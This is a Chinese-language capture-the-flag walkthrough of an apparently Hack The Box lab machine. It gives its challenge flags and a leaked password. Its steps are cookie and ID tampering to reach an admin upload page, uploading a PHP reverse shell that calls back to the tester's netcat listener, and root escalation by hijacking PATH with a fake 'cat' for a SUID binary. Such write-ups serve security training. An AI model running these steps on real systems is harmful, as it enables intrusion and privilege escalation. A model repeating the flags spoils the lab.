目录
[1.With what kind of tool can intercept web traffic?](#1.With what kind of tool can intercept web traffic?)
[2.What is the path to the directory on the webserver that returns a login page?](#2.What is the path to the directory on the webserver that returns a login page?)
[3.What can be modified in Firefox to get access to the upload page?](#3.What can be modified in Firefox to get access to the upload page?)
[4.What is the access ID of the admin user?](#4.What is the access ID of the admin user?)
[5.On uploading a file, what directory does that file appear in on the server?](#5.On uploading a file, what directory does that file appear in on the server?)
[6.What is the file that contains the password that is shared with the robert user?](#6.What is the file that contains the password that is shared with the robert user?)
USER_FLAG:f2c74ee8db7983851ab2a96a44eb7981
[7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?](#7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?)
[8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?](#8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?)
[9.What SUID stands for?](#9.What SUID stands for?)
[10.What is the name of the executable being called in an insecure manner?](#10.What is the name of the executable being called in an insecure manner?)
ROOT_FLAG:af13b0bee69f8a877c3faf667f7beacf
连接至HTB服务器并开启靶机
靶机IP:10.129.215.110
分配IP:10.10.16.32
data:image/s3,"s3://crabby-images/0f7db/0f7db5b9c759d430d396dc2ed5053e557e4511c6" alt=""
1.With what kind of tool can intercept web traffic?
这题答案是代理:proxy
考虑到Kali对靶机进行渗透更方便,可选用的流量劫持工具有BurpSuite、Yakit
2.What is the path to the directory on the webserver that returns a login page?
使用fscan对靶机进行端口扫描:
php
./fscan -nopoc -nobr -np -h {TARGET_IP}
可见开启了22、80 共2个端口,且80端口存在响应200的可访问Web网页
data:image/s3,"s3://crabby-images/8e23e/8e23e74d8a3e92fb541e009186816d4aa1037b83" alt=""
再使用nmap对这两个端口进行服务单独扫描:
php
nmap -sC -sV -p 22,80 {TARGET_IP}
data:image/s3,"s3://crabby-images/b4162/b4162cb8fd6edf73f55e3a94fc533c24582699c0" alt=""
使用浏览器打开靶机Web页面:http://10.129.215.110
再使用 FindSomething 插件找到有泄露登录的路径:/cdn-cgi/login
data:image/s3,"s3://crabby-images/b6175/b6175bcf0a035244af4dda1bc5ea0efd025adddc" alt=""
3.What can be modified in Firefox to get access to the upload page?
进入登录界面:**http://10.129.215.110/cdn-cgi/login**点击左下角的以访客身份登录
data:image/s3,"s3://crabby-images/040b1/040b1caf9554da775b7c951ac9e581f884af7b26" alt=""
以访客身份登入后,点击左上角的 Account
data:image/s3,"s3://crabby-images/43055/43055d0075fe03eb2d0695968e0a9062d4f33f52" alt=""
观察到URL后面的id参数值为:2 ,并且guest的Access ID值为:2233
data:image/s3,"s3://crabby-images/23daf/23daf39ad9b0b4123c3bc58d2dc546358dbd51b7" alt=""
尝试将id值修改为:1 ,我们就获得了admin的Access ID值为:34322
data:image/s3,"s3://crabby-images/482aa/482aa1b9b9915164582af49e095071a12ba0eadf" alt=""
这里使用Yakit,点击手动劫持开始流量劫持:
data:image/s3,"s3://crabby-images/74cb3/74cb3e9aaf12abb5b1d9372d55d8f0bf5edf6feb" alt=""
点击Uploads按钮,成功劫持到请求包,修改 cookie 中的值:
data:image/s3,"s3://crabby-images/2f1fa/2f1fa1c20e4e55010543d77021f0e8f3f4c8f55f" alt=""
user修改为:34322 ,role修改为:admin
修改完成后,点击右上角的 提交数据 进行发包:
data:image/s3,"s3://crabby-images/a7e1c/a7e1c25f00485284f1dad416719ba2b8930e4761" alt=""
成功进入文件上传界面:
data:image/s3,"s3://crabby-images/9d552/9d5526a7dc378efa2647f56aa457390c95afd15f" alt=""
4.What is the access ID of the admin user?
从上文可知,通过修改cookie中的值可以访问仅管理员可访问的文件上传页面
其中user值很明显对应的是Access ID,而admin用户的Access ID:34322
data:image/s3,"s3://crabby-images/482aa/482aa1b9b9915164582af49e095071a12ba0eadf" alt=""
5.On uploading a file, what directory does that file appear in on the server?
使用 Wappalyzer 识别该页面技术栈:
data:image/s3,"s3://crabby-images/e2088/e20886303730fffc15e3a71073fb803f7984cf2f" alt=""
可见该页面所用脚本语言为:PHP ,接下来我们上传Kali自带的Webshell
路径:/usr/share/webshells/php/php-reverse-shell.php
我们修改该Webshell中的IP、PORT两个数据:
data:image/s3,"s3://crabby-images/137ef/137ef1ba7e2337c25e5977f6eacb69b26186ef33" alt=""
点击Browse选择php-reverse-shell.php,并点击Upload后抓包,同样需要对cookie的值进行修改:
data:image/s3,"s3://crabby-images/bf707/bf7073170ceae3ff2694f76ed6496394ff2c8711" alt=""
上传成功后接下来需要对靶机进行目录扫描找到文件上传路径,我这里使用dirsearch:
php
dirsearch -u http://{TARGET_IP} -e php
data:image/s3,"s3://crabby-images/f9c33/f9c33cbccc95660d3bca590f435f1bed6a533453" alt=""
这里扫到了 /uploads 目录,使用nc持续监听后访问目标URL成功getshell:
http://{TARGET_IP}/uploads/php-reverse-shell.php
data:image/s3,"s3://crabby-images/c08c5/c08c56165f8fd8b5c2c88368221d26b15fe189d2" alt=""
6.What is the file that contains the password that is shared with the robert user?
使用python中的pty模块模拟伪终端tty以获取交互shell:
执行命令:
php
python3 -c 'import pty;pty.spawn("/bin/bash")'
查找所有.php后缀文件,看是否存在敏感信息泄露:
php
find / -type f -name *.php 2>/dev/null
data:image/s3,"s3://crabby-images/71de5/71de5b0f94a0ab8940d742634dd6eb4eedda0c5e" alt=""
可以看到php文件大多集中于 /var/www/html/cdn-cgi/login/ 目录下
进入目录后查看所有内容以寻找密码:
php
cd /var/www/html/cdn-cgi/login; cat * | grep -i robert
data:image/s3,"s3://crabby-images/02c44/02c44d8820c343fa96155788f260f9b6c0d6f6ce" alt=""
用户名:robert
密码:M3g4C0rpUs3r!
再通过grep命令查询这些字符串属于哪个文件:
php
grep -rl M3g4C0rpUs3r!
data:image/s3,"s3://crabby-images/32fc6/32fc6020d1c2879dcb8c1dc8a500256a7c6992f2" alt=""
可以看到以上信息属于 db.php 文件内容
使用已获得的账户和密码对robert进行登录:
php
su robert
data:image/s3,"s3://crabby-images/73487/734876ec535ec0403a6b95f99682ae2ec7a2e563" alt=""
在**/home/robert**目录下找到了user.txt文件
data:image/s3,"s3://crabby-images/ccd1a/ccd1a076d188aa0bf542215d9bda719b81c19d0a" alt=""
USER_FLAG:f2c74ee8db7983851ab2a96a44eb7981
7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
使用 find 命令查询属于bugtracker组的所有文件:
php
find / -group bugtracker 2>/dev/null
回显为:/usr/bin/bugtracker ,进一步查看该文件信息以及权限:
php
ls -l /usr/bin/bugtracker; file /usr/bin/bugtracker
data:image/s3,"s3://crabby-images/5a56a/5a56acae6f2e4a06695d99bc0daefc40ac16fbd5" alt=""
8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?
可见bugtracker文件设置了一个setuid 集合并且文件所有者为root
在 Linux 和类 Unix 系统中,setuid(Set User ID)是一种特殊权限标志。当可执行文件被设置 setuid 权限后,执行时会以文件所有者身份而非执行用户身份运行。它主要用于实现特定系统管理任务,如普通用户通过设置了 setuid 权限的程序(如修改密码的程序)以高权限执行特定操作,同时也可提供受限的特权访问
9.What SUID stands for?
SUIB全称为:Set owner User ID
10.What is the name of the executable being called in an insecure manner?
我们直接运行bugtracker文件:
bash
cd /usr/bin; ./bugtracker
data:image/s3,"s3://crabby-images/8cb04/8cb04878c3cafbad049210c8082fe6a909c5cc0d" alt=""
- 可见,该文件运行后会执行命令:cat /root/reports/FILE
- 此时若将shell命名为 'cat' 加进PATH中,因为查找优先级比 cat 高所以优先执行
- 因此将以不安全的方式调用 cat ,实则通过运行bugtracker文件即可实现root提权
进入根目录下的/tmp文件夹中:
bash
cd /tmp
编写shell启动器并保存到'cat'文件中:
bash
echo '/bin/sh' > cat
为'cat'文件赋执行权限:
bash
chmod +x cat
将/tmp路径加入PATH环境变量头部以此提升'cat'文件查找优先权:
bash
export PATH=/tmp:$PATH
通过命令查看PATH环境变量,查看/tmp目录是否成功添加:
bash
echo $PATH
data:image/s3,"s3://crabby-images/3fd0c/3fd0c48713c7e36e5cd70db740a66b52431e65a0" alt=""
回到**/usr/bin/** 目录下,运行bugtracker文件:
bash
cd /usr/bin; ./bugtracker
data:image/s3,"s3://crabby-images/74090/7409095da59aeea4888a33f3bc22481a868120fd" alt=""
进入/root目录,找到root.txt文件,使用more、head、tail命令查看文件内容:
bash
cd /root; ls
data:image/s3,"s3://crabby-images/0e09c/0e09c8e5e12064ae37b3c4317f28d88161c7b5af" alt=""